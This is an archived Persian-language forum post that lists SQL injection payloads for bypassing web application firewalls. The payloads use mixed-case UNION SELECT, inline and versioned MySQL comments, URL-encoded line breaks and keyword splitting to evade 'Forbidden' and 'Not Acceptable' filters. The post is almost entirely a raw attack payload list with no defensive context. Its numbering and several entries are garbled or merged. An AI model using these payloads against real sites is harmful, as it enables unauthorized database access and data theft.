انجمن گروه موج سازان

نسخه‌ی کامل: حل مشکل Sql Injections fireWall BypAss
شما در حال مشاهده نسخه آرشیو هستید. برای مشاهده نسخه کامل کلیک کنید.
واسه بایپس فوربیدن و NOT Acceptable بکار میرن1) id=1+UnIoN+SeLecT 1,2,3—

2
) id=1+UnIOn/**/SeLect 1,2,3—

3
) id=1+UNIunionON+SELselectECT 1,2,3—

4
) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—

5
) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—

6
) id=1+%23*********%0aUnIOn%23*********%0aSeLecT+1,2 ,3—

7
) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3—

8
) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3—

/*!****U%0d%0aunion*/+/*!****U%0d%0aSelEct*/ 1,2,3--

9) Id=1/*!****U%0d%0aunion*/+/*!****U%0d%0aSelEct*/ 1,2,3—id=2+/*!order*/+/*!by*/+1--
id=2/**//*!order*//**//*!by*//**/1--
id=2/**//*!OrDer*//**//*!By*//**/1--
id=2/**//*!&id=ordEr*//**//**//*!&id=bY*//**/1-